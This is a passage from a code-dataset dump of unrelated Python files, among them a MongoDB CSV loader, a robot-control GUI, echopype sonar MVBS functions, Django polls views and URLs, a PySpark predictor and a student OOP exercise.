infile:\r\n\t\tword=line.split(',')\r\n\t\tfield.append(word[1])\r\nfield.pop(0)\r\n\r\nlistdict=[]\r\n\r\nwith open(\"data.csv\") as infile:\r\n\tfor line in infile:\r\n\t\tword=line.split(',')\r\n\t\tdict={}\r\n\t\tfor i in range(0,len(field)):\r\n\t\t\ttry:\r\n\t\t\t\tdict[field[i]]=int(word[i].strip('\\n'))\r\n\t\t\texcept:\r\n\t\t\t\tdict[field[i]]=word[i].strip('\\n') #collect.insert_one(dict)\r\n\t\tlistdict.append(dict)\r\n\t\tif len(listdict) ==1000:\r\n\t\t\tcollect.insert_many(listdict)\r\n\t\t\tlistdict.clear()\r\n\r\n\r\ncollect.insert_many(listdict)\r\nlistdict.clear()\r\n","sub_path":"dataload.py","file_name":"dataload.py","file_ext":"py","file_size_in_byte":771,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"61845698","text":"\nimport tkinter\nfrom tkinter import ttk\nimport mqtt_remote_method_calls as com\n\n\ndef main():\n \"\"\" Constructs and runs a GUI for this program. \"\"\"\n root = tkinter.Tk()\n\n mqtt_client = com.MqttClient()\n mqtt_client.connect_to_ev3()\n\n setup_gui(root, mqtt_client)\n\n root.mainloop()\n\n\ndef setup_gui(root_window, mqtt_client):\n \"\"\" Constructs and sets up widgets on the given window. \"\"\"\n frame = ttk.Frame(root_window, padding=10)\n frame.grid()\n\n speed_entry_box = ttk.Entry(frame)\n go_forward_button = ttk.Button(frame, text=\"Go forward\")\n\n speed_entry_box.grid()\n go_forward_button.grid()\n\n go_forward_button['command'] = \\\n lambda: handle_go_forward(speed_entry_box, mqtt_client)\n\n\ndef handle_go_forward(entry_box, mqtt_client):\n \"\"\"\n Tells the robot to go forward at the speed specified in the given entry box.\n \"\"\"\n speed_string = entry_box.get()\n mqtt_client.send_message('go_forward', [speed_string])\n print('Sending the go_forward message with speed', speed_string)\n\n\nmain()\n","sub_path":"src/capstone_2_runs_on_laptop.py","file_name":"capstone_2_runs_on_laptop.py","file_ext":"py","file_size_in_byte":1046,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"268370595","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n# @Time : 2018/6/6 17:50\n# @Author : yuangn\n# @File : models.py\n# @Software: PyCharm\n\nfrom sqlalchemy.orm import scoped_session, sessionmaker\nfrom sqlalchemy.ext.declarative import declarative_base\n\nfrom qsdatacenter.settings import *\n\ndb_session = scoped_session(sessionmaker(autocommit=False,\n autoflush=False,\n bind=ENGINE_RDB))\nBase = declarative_base()\nBase.query = db_session.query_property()\n\ndef init_db():\n # import all modules here that might define models so that\n # they will be registered properly on the metadata. Otherwise\n # you will have to import them first before calling init_db()\n Base.metadata.create_all(bind=ENGINE_RDB)","sub_path":"qsdatacenter/datamodel/orm/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":785,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"308809540","text":"#!/opt/conda/envs/dsenv/bin/python\n\nimport os\nimport sys\n\nSPARK_HOME = \"/usr/hdp/current/spark2-client\"\nPYSPARK_PYTHON = \"/opt/conda/envs/dsenv/bin/python\"\nos.environ[\"PYSPARK_PYTHON\"]= PYSPARK_PYTHON\nos.environ[\"SPARK_HOME\"] = SPARK_HOME\n\nPYSPARK_HOME = os.path.join(SPARK_HOME, \"python/lib\")\nsys.path.insert(0, os.path.join(PYSPARK_HOME, \"py4j-0.10.7-src.zip\"))\nsys.path.insert(0, os.path.join(PYSPARK_HOME, \"pyspark.zip\"))\n\n\nfrom pyspark.sql import SparkSession\nfrom pyspark import SparkConf\n\nspark = SparkSession.builder.getOrCreate()\nspark.sparkContext.setLogLevel('WARN')\nconf = SparkConf()\n\nfrom pyspark.ml import Pipeline, PipelineModel\n\nmodel = PipelineModel.load(sys.argv[1])\npath = sys.argv[2]\ntest = spark.read.json(path)\npredictions = model.transform(test)\n\npredictions.select(\"id\",\"prediction\").write.parquet(sys.argv[3], mode=\"overwrite\")\n","sub_path":"projects/4/predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":855,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"73305069","text":"\"\"\"\nContains core functions needed to compute the MVBS of an input dataset.\n\"\"\"\n\nimport warnings\nfrom typing import Tuple, Union\n\nimport dask.array\nimport numpy as np\nimport xarray as xr\n\n\ndef get_bin_indices(\n echo_range: np.ndarray, bins_er: np.ndarray, times: np.ndarray, bins_time: np.ndarray\n) -> Tuple[np.ndarray, np.ndarray]:\n \"\"\"\n Obtains the bin index of ``echo_range`` and ``times`` based\n on the binning ``bins_er`` and ``bins_time``, respectively.\n\n Parameters\n ----------\n echo_range: np.ndarray\n 2D array of echo range values\n bins_er: np.ndarray\n 1D array (used by np.digitize) representing the binning required for ``echo_range``\n times: np.ndarray\n 1D array corresponding to the time values that should be binned\n bins_time: np.ndarray\n 1D array (used by np.digitize) representing the binning required for ``times``\n\n Returns\n -------\n digitized_echo_range: np.ndarray\n 2D array of bin indices for ``echo_range``\n bin_time_ind: np.ndarray\n 1D array of bin indices for ``times``\n \"\"\"\n\n # get bin index for each echo range value\n digitized_echo_range = np.digitize(echo_range, bins_er, right=False)\n\n # turn datetime into integers, so we can use np.digitize\n if isinstance(times, dask.array.Array):\n times_i8 = times.compute().data.view(\"i8\")\n else:\n times_i8 = times.view(\"i8\")\n\n # turn datetime into integers, so we can use np.digitize\n bins_time_i8 = bins_time.view(\"i8\")\n\n # get bin index for each time\n bin_time_ind = np.digitize(times_i8, bins_time_i8, right=False)\n\n return digitized_echo_range, bin_time_ind\n\n\ndef bin_and_mean_echo_range(\n arr: Union[np.ndarray, dask.array.Array], digitized_echo_range: np.ndarray, n_bin_er: int\n) -> Union[np.ndarray, dask.array.Array]:\n \"\"\"\n Bins and means ``arr`` with respect to the ``echo_range`` bins.\n\n Parameters\n ----------\n arr: np.ndarray or dask.array.Array\n 2D array (dimension: [``echo_range`` x ``ping_time``]) to bin along ``echo_range``\n and compute mean of each bin\n digitized_echo_range: np.ndarray\n 2D array of bin indices for ``echo_range``\n n_bin_er: int\n The number of echo range bins\n\n Returns\n -------\n er_means: np.ndarray or dask.array.Array\n 2D array representing the bin and mean of ``arr`` along ``echo_range``\n \"\"\"\n\n binned_means = []\n for bin_er in range(1, n_bin_er):\n # Catch a known warning that can occur, which does not impact the results\n with warnings.catch_warnings():\n # ignore warnings caused by taking a mean of an array filled with NaNs\n warnings.filterwarnings(action=\"ignore\", message=\"Mean of empty slice\")\n\n # bin and mean echo_range dimension\n er_selected_data = np.nanmean(arr[:, digitized_echo_range == bin_er], axis=1)\n\n # collect all echo_range bins\n binned_means.append(er_selected_data)\n\n # create full echo_range binned array\n er_means = np.vstack(binned_means)\n\n return er_means\n\n\ndef get_unequal_rows(mat: np.ndarray, row: np.ndarray) -> np.ndarray:\n \"\"\"\n Obtains those row indices of ``mat`` that are not equal\n to ``row``.\n\n Parameters\n ----------\n mat: np.ndarray\n 2D array with the same column dimension as the number\n of elements in ``row``\n row: np.ndarray\n 1D array with the same number of element elements as\n the column dimension of ``mat``\n\n Returns\n -------\n row_ind_not_equal: np.ndarray\n The row indices of ``mat`` that are not equal to ``row``\n\n Notes\n -----\n Elements with NaNs are considered equal if they are in the same position.\n \"\"\"\n\n # compare row against all rows in mat (allowing for NaNs to be equal)\n element_nan_equal = (mat == row) | (np.isnan(mat) & np.isnan(row))\n\n # determine if mat row is equal to row\n row_not_equal = np.logical_not(np.all(element_nan_equal, axis=1))\n\n if isinstance(row_not_equal, dask.array.Array):\n row_not_equal = row_not_equal.compute()\n\n # get those row indices that are not equal to row\n row_ind_not_equal = np.argwhere(row_not_equal).flatten()\n\n return row_ind_not_equal\n\n\ndef if_all_er_steps_identical(er_chan: Union[xr.DataArray, np.ndarray]) -> bool:\n \"\"\"\n A comprehensive check that determines if all ``echo_range`` values\n along ``ping_time`` have the same step size. If they do not have\n the same step sizes, then grouping of the ``echo_range`` values\n will be necessary.\n\n Parameters\n ----------\n er_chan: xr.DataArray or np.ndarray\n 2D array containing the ``echo_range`` values for each ``ping_time``\n\n Returns\n -------\n bool\n True, if grouping of ``echo_range`` along ``ping_time`` is necessary, otherwise False\n\n Notes\n -----\n ``er_chan`` should have rows corresponding to ``ping_time`` and columns\n corresponding to ``range_sample``\n \"\"\"\n\n # grab the in-memory numpy echo_range values, if necessary\n if isinstance(er_chan, xr.DataArray):\n er_chan = er_chan.values\n\n # grab the first ping_time that is not filled with NaNs\n ping_index = 0\n while np.all(np.isnan(er_chan[ping_index, :])):\n ping_index += 1\n\n # determine those rows of er_chan that are not equal to the row ping_index\n unequal_ping_ind = get_unequal_rows(er_chan, er_chan[ping_index, :])\n\n if len(unequal_ping_ind) > 0:\n # see if all unequal_ping_ind are filled with NaNs\n all_nans = np.all(np.all(np.isnan(er_chan[unequal_ping_ind, :]), axis=1))\n\n if all_nans:\n # All echo_range values have the same step size\n return False\n else:\n # Some echo_range values have different step sizes\n return True\n else:\n # All echo_range values have the same step size\n return False\n\n\ndef if_last_er_steps_identical(er_chan: Union[xr.DataArray, np.ndarray]) -> bool:\n \"\"\"\n An alternative (less comprehensive) check that determines if all\n ``echo_range`` values along ``ping_time`` have the same step size.\n If they do not have the same step sizes, then grouping of the\n ``echo_range`` values will be necessary.\n\n Parameters\n ----------\n er_chan: xr.DataArray or np.ndarray\n 2D array containing the ``echo_range`` values for each ``ping_time``\n\n Returns\n -------\n bool\n True, if grouping of ``echo_range`` along ``ping_time`` is necessary, otherwise False\n\n Notes\n -----\n It is possible that this method will incorrectly determine if grouping\n is necessary.\n\n ``er_chan`` should have rows corresponding to ``ping_time`` and columns\n corresponding to ``range_sample``\n \"\"\"\n\n # determine the number of NaNs in each ping and find the unique number of NaNs\n unique_num_nans = np.unique(np.isnan(er_chan.data).sum(axis=1))\n\n # compute the results, if necessary, to allow for downstream checks\n if isinstance(unique_num_nans, dask.array.Array):\n unique_num_nans = unique_num_nans.compute()\n\n # determine if any value is not 0 or er_chan.shape[1]\n unexpected_num_nans = False in np.logical_or(\n unique_num_nans == 0, unique_num_nans == er_chan.shape[1]\n )\n\n if unexpected_num_nans:\n # echo_range varies with ping_time\n return True\n else:\n # make sure that the final echo_range value for each ping_time is the same (account for NaN)\n num_non_nans = np.logical_not(np.isnan(np.unique(er_chan.data[:, -1]))).sum()\n\n # compute the results, if necessary, to allow for downstream checks\n if isinstance(num_non_nans, dask.array.Array):\n num_non_nans = num_non_nans.compute()\n\n if num_non_nans > 1:\n # echo_range varies with ping_time\n return True\n else:\n # echo_range does not vary with ping_time\n return False\n\n\ndef is_er_grouping_needed(\n echo_range: Union[xr.DataArray, np.ndarray], comprehensive_er_check: bool\n) -> bool:\n \"\"\"\n Determines if ``echo_range`` values along ``ping_time`` can change and\n thus need to be grouped.\n\n Parameters\n ----------\n echo_range: xr.DataArray or np.ndarray\n 2D array containing the ``echo_range`` values for each ``ping_time``\n comprehensive_er_check: bool\n If True, a more comprehensive check will be completed to determine if ``echo_range``\n grouping along ``ping_time`` is needed, otherwise a less comprehensive check will be done\n\n Returns\n -------\n bool\n If True grouping of ``echo_range`` will be required, else it will not\n be necessary\n \"\"\"\n\n if comprehensive_er_check:\n return if_all_er_steps_identical(echo_range)\n else:\n return if_last_er_steps_identical(echo_range)\n\n\ndef group_dig_er_bin_mean_echo_range(\n arr: Union[np.ndarray, dask.array.Array],\n digitized_echo_range: Union[np.ndarray, dask.array.Array],\n n_bin_er: int,\n) -> Union[np.ndarray, dask.array.Array]:\n \"\"\"\n Groups the rows of ``arr`` such that they have the same corresponding\n row values in ``digitized_echo_range``, then applies ``bin_and_mean_echo_range``\n on each group, and lastly assembles the correctly ordered ``er_means`` array\n representing the bin and mean of ``arr`` with respect to ``echo_range``.\n\n Parameters\n ----------\n arr: dask.array.Array or np.ndarray\n The 2D array whose values should be binned\n digitized_echo_range: dask.array.Array or np.ndarray\n 2D array of bin indices for ``echo_range``\n n_bin_er: int\n The number of echo range bins\n\n Returns\n -------\n er_means: dask.array.Array or np.ndarray\n The bin and mean of ``arr`` with respect to ``echo_range``\n \"\"\"\n\n # compute bin indices to allow for downstream processes (mainly axis argument in unique)\n if isinstance(digitized_echo_range, dask.array.Array):\n digitized_echo_range = digitized_echo_range.compute()\n\n # determine the unique rows of digitized_echo_range and the inverse\n unique_er_bin_ind, unique_inverse = np.unique(digitized_echo_range, axis=0, return_inverse=True)\n\n # create groups of row indices using the unique inverse\n grps_same_ind = [\n np.argwhere(unique_inverse == grp).flatten() for grp in np.unique(unique_inverse)\n ]\n\n # for each group bin and mean arr along echo_range\n # note: the values appended may not be in the correct final order\n binned_er = []\n for count, grp in enumerate(grps_same_ind):\n binned_er.append(\n bin_and_mean_echo_range(arr[grp, :], unique_er_bin_ind[count, :], n_bin_er)\n )\n\n # construct er_means and put the columns in the correct order\n binned_er_array = np.hstack(binned_er)\n correct_column_ind = np.argsort(np.concatenate(grps_same_ind))\n er_means = binned_er_array[:, correct_column_ind]\n\n return er_means\n\n\ndef bin_and_mean_2d(\n arr: Union[dask.array.Array, np.ndarray],\n bins_time: np.ndarray,\n bins_er: np.ndarray,\n times: np.ndarray,\n echo_range: np.ndarray,\n comprehensive_er_check: bool = True,\n) -> np.ndarray:\n \"\"\"\n Bins and means ``arr`` based on ``times`` and ``echo_range``,\n and their corresponding bins. If ``arr`` is ``Sv`` then this\n will compute the MVBS.\n\n Parameters\n ----------\n arr: dask.array.Array or np.ndarray\n The 2D array whose values should be binned\n bins_time: np.ndarray\n 1D array (used by np.digitize) representing the binning required for ``times``\n bins_er: np.ndarray\n 1D array (used by np.digitize) representing the binning required for ``echo_range``\n times: np.ndarray\n 1D array corresponding to the time values that should be binned\n echo_range: np.ndarray\n 2D array of echo range values\n comprehensive_er_check: bool\n If True, a more comprehensive check will be completed to determine if ``echo_range``\n grouping along ``ping_time`` is needed, otherwise a less comprehensive check will be done\n\n Returns\n -------\n final_reduced: np.ndarray\n The final binned and mean ``arr``, if ``arr`` is ``Sv`` then this is the MVBS\n\n Notes\n -----\n This function assumes that ``arr`` has rows corresponding to\n ``ping_time`` and columns corresponding to ``echo_range``.\n\n This function should not be run if the number of ``echo_range`` values\n vary amongst ``ping_times``. This should not occur for our current use\n of echopype-generated Sv data.\n \"\"\"\n\n # get the number of echo range and time bins\n n_bin_er = len(bins_er)\n n_bin_time = len(bins_time)\n\n # obtain the bin indices for echo_range and times\n digitized_echo_range, bin_time_ind = get_bin_indices(echo_range, bins_er, times, bins_time)\n\n # determine if grouping of echo_range values with the same step size is necessary\n er_grouping_needed = is_er_grouping_needed(echo_range, comprehensive_er_check)\n\n if er_grouping_needed:\n # groups, bins, and means arr with respect to echo_range\n er_means = group_dig_er_bin_mean_echo_range(arr, digitized_echo_range, n_bin_er)\n else:\n # bin and mean arr with respect to echo_range\n er_means = bin_and_mean_echo_range(arr, digitized_echo_range[0, :], n_bin_er)\n\n # if er_means is a dask array we compute it so the graph does not get too large\n if isinstance(er_means, dask.array.Array):\n er_means = er_means.compute()\n\n # create final reduced array i.e. MVBS\n final = np.empty((n_bin_time, n_bin_er - 1))\n for bin_time in range(1, n_bin_time + 1):\n # obtain er_mean indices corresponding to the time bin\n indices = np.argwhere(bin_time_ind == bin_time).flatten()\n\n if len(indices) == 0:\n # fill values with NaN, if there are no values in the bin\n final[bin_time - 1, :] = np.nan\n else:\n # bin and mean the er_mean time bin\n final[bin_time - 1, :] = np.nanmean(er_means[:, indices], axis=1)\n\n return final\n\n\ndef get_MVBS_along_channels(\n ds_Sv: xr.Dataset, echo_range_interval: np.ndarray, ping_interval: np.ndarray\n) -> np.ndarray:\n \"\"\"\n Computes the MVBS of ``ds_Sv`` along each channel for the given\n intervals.\n\n Parameters\n ----------\n ds_Sv: xr.Dataset\n A Dataset containing ``Sv`` and ``echo_range`` data with coordinates\n ``channel``, ``ping_time``, and ``range_sample``\n echo_range_interval: np.ndarray\n 1D array (used by np.digitize) representing the binning required for ``echo_range``\n ping_interval: np.ndarray\n 1D array (used by np.digitize) representing the binning required for ``ping_time``\n\n Returns\n -------\n np.ndarray\n The MVBS value of the input ``ds_Sv`` for all channels\n\n Notes\n -----\n If the values in ``ds_Sv`` are delayed then the binning and mean of ``Sv`` with\n respect to ``echo_range`` will take place, then the delayed result will be computed,\n and lastly the binning and mean with respect to ``ping_time`` will be completed. It\n is necessary to apply a compute midway through this method because Dask graph layers\n get too large and this makes downstream operations very inefficient.\n \"\"\"\n\n all_MVBS = []\n for chan in ds_Sv.channel:\n # squeeze to remove \"channel\" dim if present\n # TODO: not sure why not already removed for the AZFP case. Investigate.\n ds = ds_Sv.sel(channel=chan).squeeze()\n\n # average should be done in linear domain\n sv = 10 ** (ds[\"Sv\"] / 10)\n\n # get MVBS for channel in linear domain\n chan_MVBS = bin_and_mean_2d(\n sv.data,\n bins_time=ping_interval,\n bins_er=echo_range_interval,\n times=sv.ping_time.data,\n echo_range=ds[\"echo_range\"],\n comprehensive_er_check=True,\n )\n\n # apply inverse mapping to get back to the original domain and store values\n all_MVBS.append(10 * np.log10(chan_MVBS))\n\n # collect the MVBS values for each channel\n return np.stack(all_MVBS, axis=0)\n","sub_path":"echopype/commongrid/mvbs.py","file_name":"mvbs.py","file_ext":"py","file_size_in_byte":16115,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"193313510","text":"import hashlib\nfrom builtins import super\nimport datetime\nfrom django.contrib.auth.decorators import login_required, permission_required\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.shortcuts import render, get_object_or_404\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.template import loader\nfrom .models import Question, Choice\nfrom django.http import Http404\nfrom django.urls import reverse\nfrom django.views import generic\nfrom django.utils import timezone\nfrom django.db.models import Count\nfrom .forms import AddQuestionForm, ChoiceFormSet\nfrom django.forms import formset_factory\nfrom django.utils.http import is_safe_url\nfrom django.views.decorators.cache import cache_page\n\n\n\n\n\n# Create your views here.\n'''\ndef index(request):\n latest_question_list = Question.objects.order_by('-pub_date')[:5]\n #print(latest_question_list) #printuje na serwerze co się dzieje\n template = loader.get_template('polls/index.html')\n context = {\n 'latest_question_list': latest_question_list,\n }\n #return HttpResponse(template.render(context,request))\n return render(request, 'polls/index.html', context)\n\n\ndef detail(request, question_id):\n # try:\n # question = Question.objects.get(id=question_id)\n # except Question.DoesNotExist:\n # raise Http404(\"Question does not exist\")\n ### get_object_or_404 to to samo co u góry tylko lepsze\n question = get_object_or_404(Question, pk=question_id)\n return render(request, 'polls/detail.html', {'question': question})\n #return HttpResponse(\"You're looking at question %s.\" % question_id)\n\n\ndef results(request, question_id):\n question = get_object_or_404(Question, pk=question_id)\n return render(request, 'polls/results.html', {'question': question})\n'''\n\n#new way with views\n\nclass IndexView(generic.ListView):\n paginate_by = 5\n template_name = 'polls/index.html' #Similarly, the ListView generic view uses a default template called /_list.html;\n # we use template_name to tell ListView to use our existing \"polls/index.html\" template.\n #context_object_name = 'latest_question_list' #context_object_name attribute, specifying that we want to use latest_question_list instead.\n #thats why we know what name to use in .html file\n #otherwise it would be named \"object_list\"\n\n\n def get_queryset(self): # defines how the querryset will be created, we override it to write 5 questions, not all form DB\n \"\"\"Return the last five published questions.\n\n if we wanna chenge the context #context = super().get_context_data(**kwargs) ### in this case super() referse to parent classes in a\n we need to remember (if needed) to get context from parents class\n \"\"\"\n # we return 5 latests questions which date is allready released\n if self.request.user.is_authenticated:\n return Question.objects.filter(pub_date__lte=timezone.now()).annotate(choice_count=Count('choice')).filter(choice_count__gte=1).order_by('-pub_date')\n else:\n return []\n\n #pub_date__lte <- \"less then or equal to\" && number of choices greater than or equal to 1\n\n\n # to use different context we overload the get_context_data method\n def get_context_data(self, **kwargs):\n # Call the base implementation first to get the context\n context = super().get_context_data(**kwargs)\n\n # Number of visits to this view, as counted in the session variable.\n num_visits = self.request.session.get('num_visits', 0)\n self.request.session['num_visits'] = num_visits + 1\n # Create any data and add it to the context\n context['num_visits'] = num_visits\n return context\n\n\n\n\nclass DetailView(LoginRequiredMixin,generic.DetailView): #used to let to this URL only logged in users\n # redirect_field_name = 'redirect_to' #uf we want to redirect it to different URL\n model = Question\n template_name = 'polls/detail.html' # DetailView generic view uses a template called /_detail.html.\n # In our case, it would use the template \"polls/question_detail.html\". The template_name attribute is used to tell\n # Django to use a specific template name instead of the autogenerated default template name.\n\n #@property #turns the function into \"getter\" - read-only atrubite\n def get_queryset(self):\n \"\"\"\n Excludes any questions that aren't published yet.\n \"\"\"\n return Question.objects.filter(pub_date__lte=timezone.now()) # it is DetailView thats why we dont use\n # choice_set because we allready have object\n\n\nclass ResultsView(generic.DetailView):\n model = Question\n template_name = 'polls/results.html'\n\n# used for function based views\n@login_required #with this decorator (func which gets func as argument) lets logged users to use this function, if not they will be transsfered to login page\ndef vote(request, question_id):\n question = get_object_or_404(Question, pk=question_id)\n try:\n selected_choice = question.choice_set.get(pk=request.POST['choice']) #request.POST dostaję request typu post bo ktoś kliknął w guzik\n # <- this in html\n # dictionary-like object that lets you access submitted data by key name\n except (KeyError, Choice.DoesNotExist):\n # Redisplay the question voting form.\n return render(request, 'polls/detail.html', {\n 'question': question,\n 'error_message': \"You didn't select a choice.\",\n })\n else:\n selected_choice.votes += 1\n selected_choice.save()\n # Always return an HttpResponseRedirect after successfully dealing\n # with POST data. This prevents data from being posted twice if a\n # user hits the Back button.\n return HttpResponseRedirect(reverse('polls:results', args=(question.id,)))\n # HttpResponseRedirect takes a single argument: the URL to which the user will be redirected\n # you should always return an HttpResponseRedirect after successfully dealing with POST data.\n # This tip isn’t specific to Django; it’s good Web development practice in general.\n\n #redirect helps to avoid hardcoding URL , given name where we want to pass controll and arguments\n\n#The add question process will be writing to our database, so, by convention, we use the POST request approach.\n# for class based view we need PermisionRequiredMixin and variable permission_required = 'catalog.can_mark_returned'\n@permission_required('question.can_add_question')\ndef AddQuestion(request):\n # If this is a POST request then process the Form data\n\n \"\"\"ChoiceFormSet = formset_factory(ChoiceForm, formset=BaseChoiceFormSet, max_num=10, validate_max=True,\n min_num=2, validate_min=True, can_delete=True)\"\"\"\n\n if request.method == 'POST':\n print('\\n\\n',request.POST,'\\n\\n',request.POST.get('csrfmiddlewaretoken').encode('utf-8'),'\\n\\n',request.session,'\\n\\n')\n\n # Create a form instance and populate it with data from the request (binding):\n form = AddQuestionForm(request.POST)\n\n ChoicesFormset = ChoiceFormSet(request.POST) #request.FILES for files upload handling\n\n # hashstring = hashlib.sha1(request.POST.get('csrfmiddlewaretoken').encode('utf-8')) ## This is going to be unique\n # if request.session.get('sesionform') != hashstring:\n # Check if the form is valid:\n if form.is_valid() and ChoicesFormset.is_valid():\n question_instance = Question(question_text = form.cleaned_data['question_text'],\\\n pub_date = form.cleaned_data['pub_date'])\n question_instance.save()\n\n print('print all ChoicesFormset')\n print(ChoicesFormset)\n for answer in ChoicesFormset:\n print('rpint jeden test')\n print(answer)\n choice_instance = Choice(question = question_instance, choice_text = answer.cleaned_data['choice_text'])\n choice_instance.save()\n\n #check if redirect URL is safe\n print(is_safe_url(reverse('polls:index'),allowed_hosts=None))\n # redirect to a new URL:\n return HttpResponseRedirect(reverse('polls:index'))\n\n # If this is a GET (or any other method) create the default form.\n else:\n form = AddQuestionForm()\n ChoicesFormset = ChoiceFormSet()\n\n\n context = {\n 'form': form,\n 'choices': ChoicesFormset,\n #'question_instance': question_instance,\n }\n\n return render(request, 'polls/AddQuestion.html', context)","sub_path":"polls/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8739,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"321995086","text":"class Tasit():\n\n tasit_sayisi = 0\n __tasitlarim = []\n\n def __init__(self, motor_gucu, koltuk_sayisi, km_durumu, modeli, satis_yili, tekerlek_sayisi = 4):\n self.motor_gucu = motor_gucu\n self.koltuk_sayisi = koltuk_sayisi\n self.km_durumu = km_durumu\n self.modeli = modeli\n self.satis_yili = satis_yili\n self.tekerlek_sayisi = tekerlek_sayisi\n Tasit.__tasitlarim.append(self)\n\n @classmethod\n def tasit_miktari_goruntule(cls):\n return len(cls.__tasitlarim)\n\n def koltuksayisi(self):\n print(\"Aracin koltuk sayisi : \", tasit1.koltuk_sayisi)\n\n def model_goster(self):\n print(\"Aracin modeli : \", tasit1.modeli)\n\n def kmdurumu(self):\n print(\"Aracin km'si : \", tasit1.km_durumu)\n\n def tasit_miktari_guncelle(self):\n Tasit.tasit_sayisi += 1\n print(\"Mevcut arac sayisi : \", Tasit.tasit_sayisi)\n\n\nclass Araba(Tasit):\n\n def __init__(self, motor_gucu, koltuk_sayisi, km_durumu, modeli, satis_yili, max_hiz):\n super().__init__(motor_gucu, koltuk_sayisi, km_durumu, modeli, satis_yili)\n self.max_hiz=max_hiz\n\n def arabayi_durdur(self):\n print(\"Araba durdu\")\n\n def gaza_bas(self):\n print(\"Araba hizlaniyor\")\n\n def arabayi_yavaslat(self):\n print(\"Araba yavasliyor\")\n\n def arabanin_durumunu_goster(self):\n if issubclass(Araba,Tasit):\n print(\"Bu sinif 'Tasit' sinifindan miras alinmistir\")\n else:\n print(\"Araba sinifi 'Tasit' sinifindan miras alinMAmistir\")\n\n def model_goster(self):\n print(\"Araba sinifinin methodu…\")\n super().model_goster()\n\ntasit1 = Tasit(1600, 6, 76825, 2016, 2018)\naraba1 = Araba(1600, 6, 76825, 2016, 2018, 340)\n\n\n\n\nprint(\"\"\"Lutfen yapmak istediginiz islemi seciniz\\n\n Koltuk sayisini gorme 1\n Tasitin modelini gorme 2\n Tasitin km'sini gorme 3\n Tasit miktarini guncelle 4\n Arabayi durdur 5\n Arabayi hizlandir 6\n Arabayi yavaslat 7\n Arabanin modelini goster 8\n Arabanin durumunu goster 9\n\"\"\")\n\nwhile True:\n\n islem = input(\"\\nLutfen yapmak istediginiz islemi seciniz : \")\n\n if islem == \"1\":\n koltuk = tasit1.koltuk_sayisi\n tasit1.koltuksayisi()\n\n elif islem == \"2\":\n model = tasit1.modeli\n tasit1.model_goster()\n\n elif islem == \"3\":\n km = tasit1.km_durumu\n tasit1.kmdurumu()\n\n elif islem == \"4\":\n tasit1.tasit_miktari_guncelle()\n\n elif islem == \"5\":\n araba1.arabayi_durdur()\n\n elif islem == \"6\":\n araba1.gaza_bas()\n\n elif islem == \"7\":\n araba1.arabayi_yavaslat()\n\n elif islem == \"8\":\n araba1.model_goster()\n\n elif islem == \"9\":\n araba1.arabanin_durumunu_goster()\n","sub_path":"05.09.19_odev.py","file_name":"05.09.19_odev.py","file_ext":"py","file_size_in_byte":2787,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"362379547","text":"\"\"\"reroll URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/2.2/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path, re_path, include\nfrom django.conf import settings\nfrom django.views.generic import TemplateView\n\nfrom rest_framework import permissions\nfrom drf_yasg.views import get_schema_view as get_yasg_schema_view\nfrom drf_yasg import openapi\n\nyasg_schema_view = get_yasg_schema_view(\n openapi.Info(\n title=\"REROLL API\",\n default_version='v1',\n description=\"API for REROLL application\",\n terms_of_service=\"/terms\",\n ),\n public=True,\n permission_classes=(permissions.AllowAny,),\n)\n\nurlpatterns = [\n path('', TemplateView.as_view(template_name=\"index.html\")),\n\n # admin panel\n path('admin/', admin.site.urls),\n\n # django-allauth urls\n path(r'accounts/', include('allauth.urls')),\n\n # api\n path('api/v1/', include('webapi.urls')),\n]\n\ninternal_apis = []\n\nurlpatterns += internal_apis\n\nif settings.DEBUG:\n urlpatterns += [\n re_path(r'^swagger(?P\\.json|\\.yaml)$', yasg_schema_view.without_ui(cache_timeout=0), name='schema-json'),\n path(r'swagger/', yasg_schema_view.with_ui('swagger', cache_timeout=0), name='schema-swagger-ui'),\n ]\n","sub_path":"backend/reroll/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1799,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"56550143","text":"import scipy.io as sio\nimport os \nimport matplotlib.pyplot as plt\nimport isee_engine.nwb as nwb\nfrom linearfilter import SpatioTemporalFilter\nimport numpy as np \nfrom spatialfilter import GaussianSpatialFilter\nfrom transferfunction import ScalarTransferFunction\nfrom temporalfilter import TemporalFilterCosineBump\nfrom cursor import LNUnitCursor, MultiLNUnitCursor\nfrom movie import Movie \nfrom lgnmodel1 import LGNModel, heat_plot\nfrom cellmodel import LGNOnCell, LGNOffCell,LGNOnOffCell,TwoSubfieldLinearCell, OnUnit, OffUnit\nfrom transferfunction import MultiTransferFunction, ScalarTransferFunction\nfrom lnunit import LNUnit, MultiLNUnit \nfrom sympy.abc import x as symbolic_x\nfrom sympy.abc import y as symbolic_y\nfrom kernel import Kernel3D\nfrom movie import Movie, FullFieldFlashMovie\nimport itertools\nimport scipy.stats as sps\n\n# def multi_cell_tensor_generator(cell_creation_function, **kwargs):\n# \n# sew_param_dict = {}\n# static_param_dict = {}\n# for key, val in 